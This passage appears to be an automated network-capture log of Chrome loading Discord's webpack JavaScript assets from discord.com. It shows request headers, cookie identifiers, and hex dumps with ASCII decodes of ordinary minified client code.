                                                                          Data Ascii: 0928:function(e,t,d){"use strict";d.r(t),d.d(t,{getGuildFeedSeenManagerId:function(){return F},default:function(){return n}}),d("222007"),d("424973");var n,i=d("872717"),a=d("913144"),l=d("263024"),u=d("660478"),s=d("395118"),r=d("599110"),E=d("449008"),o
                                                                          2023-12-10 16:45:18 UTC1369INData Raw: 6e 49 64 3a 6e 2c 74 72 61 63 6b 65 64 46 65 65 64 49 74 65 6d 73 3a 61 2c 66 65 65 64 49 74 65 6d 53 6e 61 70 73 68 6f 74 73 3a 6c 2c 69 73 46 6f 72 63 65 64 46 6c 75 73 68 3a 75 7d 3d 65 2c 73 3d 7b 7d 3b 66 6f 72 28 6c 65 74 20 65 20 6f 66 20 4f 62 6a 65 63 74 2e 6b 65 79 73 28 61 29 29 7b 6c 65 74 20 74 3d 61 5b 65 5d 2c 64 3d 74 2e 63 6f 6d 70 75 74 65 53 65 65 6e 54 69 6d 65 44 65 73 74 72 75 63 74 69 76 65 28 75 29 3b 64 3e 30 26 26 28 73 5b 65 5d 3d 7b 61 64 64 69 74 69 6f 6e 61 6c 53 65 65 6e 54 69 6d 65 4d 69 6c 6c 69 73 3a 64 7d 29 7d 69 66 28 30 3d 3d 3d 4f 62 6a 65 63 74 2e 6b 65 79 73 28 73 29 2e 6c 65 6e 67 74 68 29 72 65 74 75 72 6e 20 50 72 6f 6d 69 73 65 2e 72 65 73 6f 6c 76 65 28 29 3b 6c 65 74 20 6f 3d 5b 5d 2c 63 3d 5b 5d 2c 66 3d 5b
                                                                          Data Ascii: nId:n,trackedFeedItems:a,feedItemSnapshots:l,isForcedFlush:u}=e,s={};for(let e of Object.keys(a)){let t=a[e],d=t.computeSeenTimeDestructive(u);d>0&&(s[e]={additionalSeenTimeMillis:d})}if(0===Object.keys(s).length)return Promise.resolve();let o=[],c=[],f=[
                                                                          2023-12-10 16:45:18 UTC1001INData Raw: 45 29 2c 62 6f 64 79 3a 7b 6d 61 6e 75 61 6c 3a 21 30 2c 6d 65 6e 74 69 6f 6e 5f 63 6f 75 6e 74 3a 72 2d 63 7d 7d 29 7d 2c 74 68 69 73 2e 67 75 69 6c 64 49 64 3d 64 2c 74 68 69 73 2e 6c 6f 61 64 49 64 3d 65 2c 74 68 69 73 2e 68 6f 6d 65 53 65 73 73 69 6f 6e 49 64 3d 74 2c 74 68 69 73 2e 70 65 6e 64 69 6e 67 52 65 61 64 41 63 6b 73 3d 7b 7d 2c 74 68 69 73 2e 66 65 65 64 49 74 65 6d 53 6e 61 70 73 68 6f 74 73 3d 7b 7d 2c 74 68 69 73 2e 6c 61 73 74 46 6c 75 73 68 54 69 6d 65 4d 69 6c 6c 69 73 3d 44 61 74 65 2e 6e 6f 77 28 29 7d 7d 7d 2c 36 34 35 36 30 30 3a 66 75 6e 63 74 69 6f 6e 28 65 2c 74 2c 64 29 7b 22 75 73 65 20 73 74 72 69 63 74 22 3b 64 2e 72 28 74 29 2c 64 2e 64 28 74 2c 7b 64 65 66 61 75 6c 74 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e
                                                                          Data Ascii: E),body:{manual:!0,mention_count:r-c}})},this.guildId=d,this.loadId=e,this.homeSessionId=t,this.pendingReadAcks={},this.feedItemSnapshots={},this.lastFlushTimeMillis=Date.now()}}},645600:function(e,t,d){"use strict";d.r(t),d.d(t,{default:function(){return


                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                          319192.168.2.550055162.159.137.2324435756C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                          TimestampBytes transferredDirectionData
                                                                          2023-12-10 16:45:18 UTC866OUTGET /assets/74783.f757e19ccddf8f692dc9.js HTTP/1.1
                                                                          Host: discord.com
                                                                          Connection: keep-alive
                                                                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                          sec-ch-ua-mobile: ?0
                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                          sec-ch-ua-platform: "Windows"
                                                                          Accept: */*
                                                                          Sec-Fetch-Site: same-origin
                                                                          Sec-Fetch-Mode: no-cors
                                                                          Sec-Fetch-Dest: script
                                                                          Referer: https://discord.com/invite/boringsecurity
                                                                          Accept-Encoding: gzip, deflate, br
                                                                          Accept-Language: en-US,en;q=0.9
                                                                          Cookie: __dcfduid=79a14dd0977b11eea42d670f70a22cc1; __sdcfduid=79a14dd1977b11eea42d670f70a22cc1d54c5ff17e3ae6d1c8d813524e80fff90af806631d5e3c4a7bbe794afe9267c8; __cfruid=88265d2eabed649c144acdb2d7cc9060a4b7d732-1702226707; _cfuvid=ooZGhTfw6Uh_zbbx7_K1mJVB4VRrOd2YJcPHqWLx4oI-1702226718440-0-604800000
                                                                          2023-12-10 16:45:19 UTC971INData Raw: 48 54 54 50 2f 31 2e 31 20 32 30 30 20 4f 4b 0d 0a 44 61 74 65 3a 20 53 75 6e 2c 20 31 30 20 44 65 63 20 32 30 32 33 20 31 36 3a 34 35 3a 31 39 20 47 4d 54 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 6a 61 76 61 73 63 72 69 70 74 0d 0a 43 6f 6e 74 65 6e 74 2d 4c 65 6e 67 74 68 3a 20 38 32 37 34 37 0d 0a 43 6f 6e 6e 65 63 74 69 6f 6e 3a 20 63 6c 6f 73 65 0d 0a 43 46 2d 52 61 79 3a 20 38 33 33 36 66 35 32 31 63 61 36 64 32 31 66 34 2d 4d 49 41 0d 0a 43 46 2d 43 61 63 68 65 2d 53 74 61 74 75 73 3a 20 48 49 54 0d 0a 41 63 63 65 70 74 2d 52 61 6e 67 65 73 3a 20 62 79 74 65 73 0d 0a 41 63 63 65 73 73 2d 43 6f 6e 74 72 6f 6c 2d 41 6c 6c 6f 77 2d 4f 72 69 67 69 6e 3a 20 68 74 74 70 73 3a 2f 2f 64 69 73 63 6f 72 64 2e 63 6f
                                                                          Data Ascii: HTTP/1.1 200 OKDate: Sun, 10 Dec 2023 16:45:19 GMTContent-Type: application/javascriptContent-Length: 82747Connection: closeCF-Ray: 8336f521ca6d21f4-MIACF-Cache-Status: HITAccept-Ranges: bytesAccess-Control-Allow-Origin: https://discord.co
                                                                          2023-12-10 16:45:19 UTC398INData Raw: 28 74 68 69 73 2e 77 65 62 70 61 63 6b 43 68 75 6e 6b 64 69 73 63 6f 72 64 5f 61 70 70 3d 74 68 69 73 2e 77 65 62 70 61 63 6b 43 68 75 6e 6b 64 69 73 63 6f 72 64 5f 61 70 70 7c 7c 5b 5d 29 2e 70 75 73 68 28 5b 5b 22 37 34 37 38 33 22 5d 2c 7b 36 36 36 30 32 30 3a 66 75 6e 63 74 69 6f 6e 28 65 2c 74 2c 6e 29 7b 22 75 73 65 20 73 74 72 69 63 74 22 3b 6e 2e 72 28 74 29 2c 6e 2e 64 28 74 2c 7b 73 75 62 73 63 72 69 62 65 4d 65 6d 62 65 72 73 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 72 7d 2c 75 6e 73 75 62 73 63 72 69 62 65 4d 65 6d 62 65 72 73 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 6f 7d 2c 73 75 62 73 63 72 69 62 65 43 68 61 6e 6e 65 6c 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 75 7d 2c 73 75 62 73 63 72 69 62
                                                                          Data Ascii: (this.webpackChunkdiscord_app=this.webpackChunkdiscord_app||[]).push([["74783"],{666020:function(e,t,n){"use strict";n.r(t),n.d(t,{subscribeMembers:function(){return r},unsubscribeMembers:function(){return o},subscribeChannel:function(){return u},subscrib
                                                                          2023-12-10 16:45:19 UTC1369INData Raw: 49 4f 4e 53 5f 4d 45 4d 42 45 52 53 5f 41 44 44 22 2c 67 75 69 6c 64 49 64 3a 65 2c 75 73 65 72 49 64 73 3a 74 7d 29 7d 66 75 6e 63 74 69 6f 6e 20 6f 28 65 2c 74 29 7b 69 2e 64 65 66 61 75 6c 74 2e 64 69 73 70 61 74 63 68 28 7b 74 79 70 65 3a 22 47 55 49 4c 44 5f 53 55 42 53 43 52 49 50 54 49 4f 4e 53 5f 4d 45 4d 42 45 52 53 5f 52 45 4d 4f 56 45 22 2c 67 75 69 6c 64 49 64 3a 65 2c 75 73 65 72 49 64 73 3a 74 7d 29 7d 66 75 6e 63 74 69 6f 6e 20 75 28 65 2c 74 2c 6e 29 7b 69 2e 64 65 66 61 75 6c 74 2e 64 69 73 70 61 74 63 68 28 7b 74 79 70 65 3a 22 47 55 49 4c 44 5f 53 55 42 53 43 52 49 50 54 49 4f 4e 53 5f 43 48 41 4e 4e 45 4c 22 2c 67 75 69 6c 64 49 64 3a 65 2c 63 68 61 6e 6e 65 6c 49 64 3a 74 2c 72 61 6e 67 65 73 3a 6e 7d 29 7d 66 75 6e 63 74 69 6f 6e 20
                                                                          Data Ascii: IONS_MEMBERS_ADD",guildId:e,userIds:t})}function o(e,t){i.default.dispatch({type:"GUILD_SUBSCRIPTIONS_MEMBERS_REMOVE",guildId:e,userIds:t})}function u(e,t,n){i.default.dispatch({type:"GUILD_SUBSCRIPTIONS_CHANNEL",guildId:e,channelId:t,ranges:n})}function
                                                                          2023-12-10 16:45:19 UTC1243INData Raw: 2e 64 69 73 70 61 74 63 68 28 7b 74 79 70 65 3a 22 4e 45 57 5f 50 41 59 4d 45 4e 54 5f 53 4f 55 52 43 45 5f 43 4c 45 41 52 5f 45 52 52 4f 52 22 7d 29 29 7d 7d 2c 35 35 36 38 39 3a 66 75 6e 63 74 69 6f 6e 28 65 2c 74 2c 6e 29 7b 22 75 73 65 20 73 74 72 69 63 74 22 3b 6e 2e 72 28 74 29 2c 6e 2e 64 28 74 2c 7b 63 6c 65 61 72 50 75 72 63 68 61 73 65 54 6f 6b 65 6e 41 75 74 68 53 74 61 74 65 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 6c 7d 7d 29 3b 76 61 72 20 69 3d 6e 28 22 39 31 33 31 34 34 22 29 3b 66 75 6e 63 74 69 6f 6e 20 6c 28 29 7b 69 2e 64 65 66 61 75 6c 74 2e 64 69 73 70 61 74 63 68 28 7b 74 79 70 65 3a 22 42 49 4c 4c 49 4e 47 5f 50 55 52 43 48 41 53 45 5f 54 4f 4b 45 4e 5f 41 55 54 48 5f 43 4c 45 41 52 5f 53 54 41 54 45 22 7d 29 7d 7d
                                                                          Data Ascii: .dispatch({type:"NEW_PAYMENT_SOURCE_CLEAR_ERROR"}))}},55689:function(e,t,n){"use strict";n.r(t),n.d(t,{clearPurchaseTokenAuthState:function(){return l}});var i=n("913144");function l(){i.default.dispatch({type:"BILLING_PURCHASE_TOKEN_AUTH_CLEAR_STATE"})}}
                                                                          2023-12-10 16:45:19 UTC1369INData Raw: 43 43 4f 55 4e 54 5f 49 4e 49 54 22 7d 29 7d 66 75 6e 63 74 69 6f 6e 20 70 28 29 7b 6f 2e 64 65 66 61 75 6c 74 2e 64 69 73 70 61 74 63 68 28 7b 74 79 70 65 3a 22 55 53 45 52 5f 53 45 54 54 49 4e 47 53 5f 41 43 43 4f 55 4e 54 5f 43 4c 4f 53 45 22 7d 29 7d 66 75 6e 63 74 69 6f 6e 20 54 28 65 2c 74 29 7b 6c 65 74 20 6e 3d 74 3f 5f 2e 64 65 66 61 75 6c 74 2e 4d 65 73 73 61 67 65 73 2e 44 45 4c 45 54 45 5f 41 43 43 4f 55 4e 54 3a 5f 2e 64 65 66 61 75 6c 74 2e 4d 65 73 73 61 67 65 73 2e 44 49 53 41 42 4c 45 5f 41 43 43 4f 55 4e 54 2c 6c 3d 74 3f 66 2e 45 6e 64 70 6f 69 6e 74 73 2e 44 45 4c 45 54 45 5f 41 43 43 4f 55 4e 54 3a 66 2e 45 6e 64 70 6f 69 6e 74 73 2e 44 49 53 41 42 4c 45 5f 41 43 43 4f 55 4e 54 3b 72 65 74 75 72 6e 28 30 2c 63 2e 64 65 66 61 75 6c 74
                                                                          Data Ascii: CCOUNT_INIT"})}function p(){o.default.dispatch({type:"USER_SETTINGS_ACCOUNT_CLOSE"})}function T(e,t){let n=t?_.default.Messages.DELETE_ACCOUNT:_.default.Messages.DISABLE_ACCOUNT,l=t?f.Endpoints.DELETE_ACCOUNT:f.Endpoints.DISABLE_ACCOUNT;return(0,c.default
                                                                          2023-12-10 16:45:19 UTC1369INData Raw: 21 3d 61 26 26 6e 75 6c 6c 21 3d 73 26 26 28 6f 2e 70 75 73 68 5f 70 72 6f 76 69 64 65 72 3d 61 2c 6f 2e 70 75 73 68 5f 74 6f 6b 65 6e 3d 73 29 3b 6c 65 74 20 63 3d 6c 2e 64 65 66 61 75 6c 74 2e 67 65 74 28 66 2e 44 45 56 49 43 45 5f 56 4f 49 50 5f 54 4f 4b 45 4e 29 3b 72 65 74 75 72 6e 20 6e 75 6c 6c 21 3d 45 2e 44 45 56 49 43 45 5f 50 55 53 48 5f 56 4f 49 50 5f 50 52 4f 56 49 44 45 52 26 26 6e 75 6c 6c 21 3d 63 26 26 28 6f 2e 70 75 73 68 5f 76 6f 69 70 5f 70 72 6f 76 69 64 65 72 3d 45 2e 44 45 56 49 43 45 5f 50 55 53 48 5f 56 4f 49 50 5f 50 52 4f 56 49 44 45 52 2c 6f 2e 70 75 73 68 5f 76 6f 69 70 5f 74 6f 6b 65 6e 3d 63 29 2c 68 28 6f 29 7d 2c 7b 63 68 65 63 6b 45 6e 61 62 6c 65 64 3a 21 31 2c 6d 6f 64 61 6c 50 72 6f 70 73 3a 7b 74 69 74 6c 65 3a 5f 2e
                                                                          Data Ascii: !=a&&null!=s&&(o.push_provider=a,o.push_token=s);let c=l.default.get(f.DEVICE_VOIP_TOKEN);return null!=E.DEVICE_PUSH_VOIP_PROVIDER&&null!=c&&(o.push_voip_provider=E.DEVICE_PUSH_VOIP_PROVIDER,o.push_voip_token=c),h(o)},{checkEnabled:!1,modalProps:{title:_.
                                                                          2023-12-10 16:45:19 UTC1369INData Raw: 63 68 28 7b 74 79 70 65 3a 22 55 53 45 52 5f 53 45 54 54 49 4e 47 53 5f 41 43 43 4f 55 4e 54 5f 53 45 54 5f 50 45 4e 44 49 4e 47 5f 50 52 4f 46 49 4c 45 5f 45 46 46 45 43 54 5f 49 44 22 2c 70 72 6f 66 69 6c 65 45 66 66 65 63 74 49 44 3a 65 7d 29 7d 66 75 6e 63 74 69 6f 6e 20 52 28 65 29 7b 6f 2e 64 65 66 61 75 6c 74 2e 64 69 73 70 61 74 63 68 28 7b 74 79 70 65 3a 22 55 53 45 52 5f 53 45 54 54 49 4e 47 53 5f 41 43 43 4f 55 4e 54 5f 53 45 54 5f 53 49 4e 47 4c 45 5f 54 52 59 5f 49 54 5f 4f 55 54 5f 43 4f 4c 4c 45 43 54 49 42 4c 45 53 5f 49 54 45 4d 22 2c 69 74 65 6d 3a 65 7d 29 7d 66 75 6e 63 74 69 6f 6e 20 4c 28 29 7b 6f 2e 64 65 66 61 75 6c 74 2e 64 69 73 70 61 74 63 68 28 7b 74 79 70 65 3a 22 55 53 45 52 5f 53 45 54 54 49 4e 47 53 5f 43 4c 45 41 52 5f 45
                                                                          Data Ascii: ch({type:"USER_SETTINGS_ACCOUNT_SET_PENDING_PROFILE_EFFECT_ID",profileEffectID:e})}function R(e){o.default.dispatch({type:"USER_SETTINGS_ACCOUNT_SET_SINGLE_TRY_IT_OUT_COLLECTIBLES_ITEM",item:e})}function L(){o.default.dispatch({type:"USER_SETTINGS_CLEAR_E
                                                                          2023-12-10 16:45:19 UTC1369INData Raw: 72 43 6c 61 73 73 3a 75 3d 22 22 2c 63 6f 6c 6f 72 3a 73 3d 6c 2e 64 65 66 61 75 6c 74 2e 63 6f 6c 6f 72 73 2e 49 4e 54 45 52 41 43 54 49 56 45 5f 4e 4f 52 4d 41 4c 2c 63 6f 6c 6f 72 43 6c 61 73 73 3a 61 3d 22 22 2c 2e 2e 2e 63 7d 3d 65 3b 72 65 74 75 72 6e 28 30 2c 69 2e 6a 73 78 73 29 28 22 73 76 67 22 2c 7b 2e 2e 2e 28 30 2c 72 2e 64 65 66 61 75 6c 74 29 28 63 29 2c 78 6d 6c 6e 73 3a 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 30 2f 73 76 67 22 2c 77 69 64 74 68 3a 74 2c 68 65 69 67 68 74 3a 6e 2c 66 69 6c 6c 3a 22 6e 6f 6e 65 22 2c 76 69 65 77 42 6f 78 3a 22 30 20 30 20 32 34 20 32 34 22 2c 63 68 69 6c 64 72 65 6e 3a 5b 28 30 2c 69 2e 6a 73 78 29 28 22 63 69 72 63 6c 65 22 2c 7b 63 78 3a 22 31 32 22 2c 63 79 3a 22 31 32 22 2c 72
                                                                          Data Ascii: rClass:u="",color:s=l.default.colors.INTERACTIVE_NORMAL,colorClass:a="",...c}=e;return(0,i.jsxs)("svg",{...(0,r.default)(c),xmlns:"http://www.w3.org/2000/svg",width:t,height:n,fill:"none",viewBox:"0 0 24 24",children:[(0,i.jsx)("circle",{cx:"12",cy:"12",r
                                                                          2023-12-10 16:45:19 UTC1369INData Raw: 22 2c 63 6c 69 70 52 75 6c 65 3a 22 65 76 65 6e 6f 64 64 22 2c 63 6c 61 73 73 4e 61 6d 65 3a 61 7d 29 5d 7d 29 7d 7d 2c 39 39 38 34 36 30 3a 66 75 6e 63 74 69 6f 6e 28 65 2c 74 2c 6e 29 7b 22 75 73 65 20 73 74 72 69 63 74 22 3b 6e 2e 72 28 74 29 2c 6e 2e 64 28 74 2c 7b 47 69 66 74 49 63 6f 6e 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 6f 7d 7d 29 3b 76 61 72 20 69 3d 6e 28 22 33 37 39 38 33 22 29 3b 6e 28 22 38 38 34 36 39 31 22 29 3b 76 61 72 20 6c 3d 6e 28 22 36 36 39 34 39 31 22 29 2c 72 3d 6e 28 22 37 35 31 39 36 22 29 3b 6c 65 74 20 6f 3d 65 3d 3e 7b 6c 65 74 7b 77 69 64 74 68 3a 74 3d 32 34 2c 68 65 69 67 68 74 3a 6e 3d 32 34 2c 63 6f 6c 6f 72 3a 6f 3d 6c 2e 64 65 66 61 75 6c 74 2e 63 6f 6c 6f 72 73 2e 49 4e 54 45 52 41 43 54 49 56 45
                                                                          Data Ascii: ",clipRule:"evenodd",className:a})]})}},998460:function(e,t,n){"use strict";n.r(t),n.d(t,{GiftIcon:function(){return o}});var i=n("37983");n("884691");var l=n("669491"),r=n("75196");let o=e=>{let{width:t=24,height:n=24,color:o=l.default.colors.INTERACTIVE
                                                                          2023-12-10 16:45:19 UTC1369INData Raw: 66 61 75 6c 74 29 28 73 29 2c 78 6d 6c 6e 73 3a 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 30 2f 73 76 67 22 2c 77 69 64 74 68 3a 74 2c 68 65 69 67 68 74 3a 6e 2c 66 69 6c 6c 3a 22 6e 6f 6e 65 22 2c 76 69 65 77 42 6f 78 3a 22 30 20 30 20 32 34 20 32 34 22 2c 63 68 69 6c 64 72 65 6e 3a 28 30 2c 69 2e 6a 73 78 29 28 22 70 61 74 68 22 2c 7b 66 69 6c 6c 3a 22 73 74 72 69 6e 67 22 3d 3d 74 79 70 65 6f 66 20 6f 3f 6f 3a 6f 2e 63 73 73 2c 64 3a 22 4d 31 34 2e 35 20 38 61 33 20 33 20 30 20 31 20 30 2d 32 2e 37 2d 34 2e 33 63 2d 2e 32 2e 34 2e 30 36 2e 38 36 2e 34 34 20 31 2e 31 32 61 35 20 35 20 30 20 30 20 31 20 32 2e 31 34 20 33 2e 30 38 63 2e 30 31 2e 30 36 2e 30 36 2e 31 2e 31 32 2e 31 5a 4d 31 38 2e 34 34 20 31 37 2e 32 37 63 2e 31 35
                                                                          Data Ascii: fault)(s),xmlns:"http://www.w3.org/2000/svg",width:t,height:n,fill:"none",viewBox:"0 0 24 24",children:(0,i.jsx)("path",{fill:"string"==typeof o?o:o.css,d:"M14.5 8a3 3 0 1 0-2.7-4.3c-.2.4.06.86.44 1.12a5 5 0 0 1 2.14 3.08c.01.06.06.1.12.1ZM18.44 17.27c.15


                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                          320192.168.2.550057162.159.137.2324435756C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                          TimestampBytes transferredDirectionData
                                                                          2023-12-10 16:45:19 UTC866OUTGET /assets/59459.805f1d37a012735e4e89.js HTTP/1.1
                                                                          Host: discord.com
                                                                          Connection: keep-alive
                                                                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                          sec-ch-ua-mobile: ?0
                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                          sec-ch-ua-platform: "Windows"
                                                                          Accept: */*
                                                                          Sec-Fetch-Site: same-origin
                                                                          Sec-Fetch-Mode: no-cors
                                                                          Sec-Fetch-Dest: script
                                                                          Referer: https://discord.com/invite/boringsecurity
                                                                          Accept-Encoding: gzip, deflate, br
                                                                          Accept-Language: en-US,en;q=0.9
                                                                          Cookie: __dcfduid=79a14dd0977b11eea42d670f70a22cc1; __sdcfduid=79a14dd1977b11eea42d670f70a22cc1d54c5ff17e3ae6d1c8d813524e80fff90af806631d5e3c4a7bbe794afe9267c8; __cfruid=88265d2eabed649c144acdb2d7cc9060a4b7d732-1702226707; _cfuvid=NtVlIpD02s2867zysSi1z_tayCu1R0dio23.m.ONvKQ-1702226718645-0-604800000
                                                                          2023-12-10 16:45:19 UTC1122INData Raw: 48 54 54 50 2f 31 2e 31 20 32 30 30 20 4f 4b 0d 0a 44 61 74 65 3a 20 53 75 6e 2c 20 31 30 20 44 65 63 20 32 30 32 33 20 31 36 3a 34 35 3a 31 39 20 47 4d 54 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 6a 61 76 61 73 63 72 69 70 74 0d 0a 43 6f 6e 74 65 6e 74 2d 4c 65 6e 67 74 68 3a 20 33 37 31 37 39 0d 0a 43 6f 6e 6e 65 63 74 69 6f 6e 3a 20 63 6c 6f 73 65 0d 0a 43 46 2d 52 61 79 3a 20 38 33 33 36 66 35 32 33 34 39 64 33 35 63 37 31 2d 4d 49 41 0d 0a 43 46 2d 43 61 63 68 65 2d 53 74 61 74 75 73 3a 20 48 49 54 0d 0a 41 63 63 65 70 74 2d 52 61 6e 67 65 73 3a 20 62 79 74 65 73 0d 0a 41 63 63 65 73 73 2d 43 6f 6e 74 72 6f 6c 2d 41 6c 6c 6f 77 2d 4f 72 69 67 69 6e 3a 20 68 74 74 70 73 3a 2f 2f 64 69 73 63 6f 72 64 2e 63 6f
                                                                          Data Ascii: HTTP/1.1 200 OKDate: Sun, 10 Dec 2023 16:45:19 GMTContent-Type: application/javascriptContent-Length: 37179Connection: closeCF-Ray: 8336f52349d35c71-MIACF-Cache-Status: HITAccept-Ranges: bytesAccess-Control-Allow-Origin: https://discord.co
                                                                          2023-12-10 16:45:19 UTC247INData Raw: 28 74 68 69 73 2e 77 65 62 70 61 63 6b 43 68 75 6e 6b 64 69 73 63 6f 72 64 5f 61 70 70 3d 74 68 69 73 2e 77 65 62 70 61 63 6b 43 68 75 6e 6b 64 69 73 63 6f 72 64 5f 61 70 70 7c 7c 5b 5d 29 2e 70 75 73 68 28 5b 5b 22 35 39 34 35 39 22 5d 2c 7b 33 30 34 39 38 33 3a 66 75 6e 63 74 69 6f 6e 28 65 2c 74 2c 6e 29 7b 22 75 73 65 20 73 74 72 69 63 74 22 3b 6e 2e 72 28 74 29 2c 6e 2e 64 28 74 2c 7b 4d 6f 72 65 48 6f 72 69 7a 6f 6e 74 61 6c 49 63 6f 6e 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 75 7d 7d 29 3b 76 61 72 20 72 3d 6e 28 22 33 37 39 38 33 22 29 3b 6e 28 22 38 38 34 36 39 31 22 29 3b 76 61 72 20 6c 3d 6e 28 22 36 36 39 34 39 31 22 29 2c 61 3d 6e 28 22 37 35 31 39 36 22 29 3b 6c 65 74 20 75 3d 65 3d 3e 7b 6c 65 74 7b
                                                                          Data Ascii: (this.webpackChunkdiscord_app=this.webpackChunkdiscord_app||[]).push([["59459"],{304983:function(e,t,n){"use strict";n.r(t),n.d(t,{MoreHorizontalIcon:function(){return u}});var r=n("37983");n("884691");var l=n("669491"),a=n("75196");let u=e=>{let{
                                                                          2023-12-10 16:45:19 UTC1369INData Raw: 77 69 64 74 68 3a 74 3d 32 34 2c 68 65 69 67 68 74 3a 6e 3d 32 34 2c 63 6f 6c 6f 72 3a 75 3d 6c 2e 64 65 66 61 75 6c 74 2e 63 6f 6c 6f 72 73 2e 49 4e 54 45 52 41 43 54 49 56 45 5f 4e 4f 52 4d 41 4c 2c 63 6f 6c 6f 72 43 6c 61 73 73 3a 6f 3d 22 22 2c 2e 2e 2e 69 7d 3d 65 3b 72 65 74 75 72 6e 28 30 2c 72 2e 6a 73 78 29 28 22 73 76 67 22 2c 7b 2e 2e 2e 28 30 2c 61 2e 64 65 66 61 75 6c 74 29 28 69 29 2c 78 6d 6c 6e 73 3a 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 30 2f 73 76 67 22 2c 77 69 64 74 68 3a 74 2c 68 65 69 67 68 74 3a 6e 2c 66 69 6c 6c 3a 22 6e 6f 6e 65 22 2c 76 69 65 77 42 6f 78 3a 22 30 20 30 20 32 34 20 32 34 22 2c 63 68 69 6c 64 72 65 6e 3a 28 30 2c 72 2e 6a 73 78 29 28 22 70 61 74 68 22 2c 7b 66 69 6c 6c 3a 22 73 74 72 69
                                                                          Data Ascii: width:t=24,height:n=24,color:u=l.default.colors.INTERACTIVE_NORMAL,colorClass:o="",...i}=e;return(0,r.jsx)("svg",{...(0,a.default)(i),xmlns:"http://www.w3.org/2000/svg",width:t,height:n,fill:"none",viewBox:"0 0 24 24",children:(0,r.jsx)("path",{fill:"stri
                                                                          2023-12-10 16:45:19 UTC1369INData Raw: 73 65 74 28 6f 5b 30 5d 2c 6c 29 7d 72 65 74 75 72 6e 20 6c 7d 7d 72 65 74 75 72 6e 20 6e 75 6c 6c 7d 66 75 6e 63 74 69 6f 6e 20 75 28 65 2c 74 29 7b 69 66 28 6e 75 6c 6c 3d 3d 65 29 72 65 74 75 72 6e 20 6e 75 6c 6c 3b 6c 65 74 20 6e 3d 5b 2e 2e 2e 65 5d 3b 72 65 74 75 72 6e 20 6e 2e 69 6e 64 65 78 3d 74 2c 6e 7d 63 6c 61 73 73 20 6f 7b 72 65 73 65 74 28 65 29 7b 74 68 69 73 2e 5f 72 75 6c 65 73 3d 5b 5d 2c 74 68 69 73 2e 5f 66 6f 6c 6c 6f 77 65 72 73 3d 7b 7d 2c 74 68 69 73 2e 5f 6e 6f 6e 54 6f 6b 65 6e 54 79 70 65 3d 6e 75 6c 6c 21 3d 65 3f 65 3a 6c 7d 61 64 64 52 75 6c 65 28 65 29 7b 6c 65 74 20 74 3b 6c 65 74 7b 74 79 70 65 3a 6e 2c 66 6f 6c 6c 6f 77 73 3a 72 2c 76 61 6c 69 64 61 74 6f 72 3a 6c 7d 3d 65 2c 7b 72 65 67 65 78 3a 61 7d 3d 65 3b 69 66 28
                                                                          Data Ascii: set(o[0],l)}return l}}return null}function u(e,t){if(null==e)return null;let n=[...e];return n.index=t,n}class o{reset(e){this._rules=[],this._followers={},this._nonTokenType=null!=e?e:l}addRule(e){let t;let{type:n,follows:r,validator:l}=e,{regex:a}=e;if(
                                                                          2023-12-10 16:45:19 UTC1369INData Raw: 3d 3e 74 68 69 73 2e 61 64 64 52 75 6c 65 28 65 29 29 7d 7d 63 6c 61 73 73 20 69 7b 67 65 74 20 65 6e 64 28 29 7b 72 65 74 75 72 6e 20 74 68 69 73 2e 73 74 61 72 74 2b 74 68 69 73 2e 6c 65 6e 67 74 68 7d 67 65 74 20 6c 65 6e 67 74 68 28 29 7b 72 65 74 75 72 6e 20 74 68 69 73 2e 6d 61 74 63 68 5b 30 5d 2e 6c 65 6e 67 74 68 7d 76 61 6c 75 65 4f 66 28 29 7b 72 65 74 75 72 6e 20 74 68 69 73 2e 6d 61 74 63 68 5b 30 5d 7d 67 65 74 46 75 6c 6c 4d 61 74 63 68 28 29 7b 72 65 74 75 72 6e 20 74 68 69 73 2e 6d 61 74 63 68 5b 30 5d 7d 67 65 74 4d 61 74 63 68 28 29 7b 6c 65 74 20 65 3d 61 72 67 75 6d 65 6e 74 73 2e 6c 65 6e 67 74 68 3e 30 26 26 76 6f 69 64 20 30 21 3d 3d 61 72 67 75 6d 65 6e 74 73 5b 30 5d 3f 61 72 67 75 6d 65 6e 74 73 5b 30 5d 3a 30 3b 72 65 74 75 72
                                                                          Data Ascii: =>this.addRule(e))}}class i{get end(){return this.start+this.length}get length(){return this.match[0].length}valueOf(){return this.match[0]}getFullMatch(){return this.match[0]}getMatch(){let e=arguments.length>0&&void 0!==arguments[0]?arguments[0]:0;retur
